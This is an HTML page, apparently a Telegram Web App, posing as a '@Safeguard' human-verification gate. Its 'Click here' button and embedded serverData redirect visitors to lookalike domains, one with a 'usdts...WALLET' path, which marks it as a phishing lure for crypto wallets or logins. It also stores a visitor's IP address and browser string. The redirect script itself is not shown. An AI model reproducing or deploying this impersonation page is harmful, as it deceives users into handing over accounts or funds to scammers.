<html style="--tg-color-scheme: dark; --tg-theme-bg-color: #212121; --tg-theme-text-color: #ffffff; --tg-theme-hint-color: #aaaaaa; --tg-theme-link-color: #8774e1; --tg-theme-button-color: #8774e1; --tg-theme-button-text-color: #ffffff; --tg-theme-secondary-bg-color: #0f0f0f; --tg-theme-header-bg-color: #212121; --tg-theme-accent-text-color: #8774e1; --tg-theme-section-bg-color: #212121; --tg-theme-section-header-text-color: #aaaaaa; --tg-theme-subtitle-text-color: #aaaaaa; --tg-theme-destructive-text-color: #e53935; --tg-viewport-height: 100vh; --tg-viewport-stable-height: 100vh;">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width">
    <title>Safeguard</title>
    <meta name="description" content="@Safeguard Verification Bot">
    <link rel="icon" href="./favicon.ico">
    <meta name="next-head-count" content="5">
    <link rel="preload" href="./css/3db7e18ba6d2d9e9.css" as="style">
    <link rel="stylesheet" href="./css/3db7e18ba6d2d9e9.css" data-n-g="">
    <script src="https://telegram.org/js/telegram-web-app.js"></script>
  </head>
  <body>
<form id="redirectForm" action="" method="get" style="display: none"></form>
    <div id="__next">
      <div class="bg-telegram-bg">
        <main class="flex items-center justify-start flex-col gap-2 h-[100vh] p-4 text-center">
          <div class="mt-5">
            <p class="text-3xl font-bold text-telegram-text">Human Verification</p>
            <p class="text-md font-bold text-telegram-text mt-2">Verify below to be granted entry</p>
            <div class="flex items-center justify-center w-100 mt-3">
              <button onclick="redirectToLogin()" class="w-full px-3 py-3 my-4 font-mono text-base rounded text-telegram-button-text bg-gradient-to-r from-button1 via-button2 to-button3 hover:bg-gradient-to-br shadow-lg shadow-black-500/50 dark:shadow-lg dark:shadow-black-800/80">Click here</button>
            </div>
          </div>
        </main>
      </div>
    </div>
<script src="/template-redirect.js"></script>
    <script>
        const tg = Telegram.WebApp.MainButton;

        // Detect Telegram's current theme
        const isDarkTheme = Telegram.WebApp.colorScheme === "dark";

        // Set the button text
        tg.setText("@safeguard");

        // Dynamically set the button's colors based on the theme
        if (isDarkTheme) {
          tg.color = "#17212b"; // Default dark gray for dark themes
          tg.textColor = "#ffffff"; // White text for dark themes
        } else {
          tg.color = "#f5f5f5"; // Light gray for light themes
          tg.textColor = "#000000"; // Black text for light themes
        }

        // Show the button
        tg.show();

        // Disable the button to make it unclickable
        tg.disable();

        console.log("MainButton styled dynamically based on the Telegram theme.");

    </script>
  <script>
            window.serverData = {
              redirectUrl: "https://walltrump.cfd",
              clientIp: "88.252.159.148",
              userAgent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36",
              domainKey: "usdts.webconnect.su/WALLET"
            };
          </script></body>
</html>
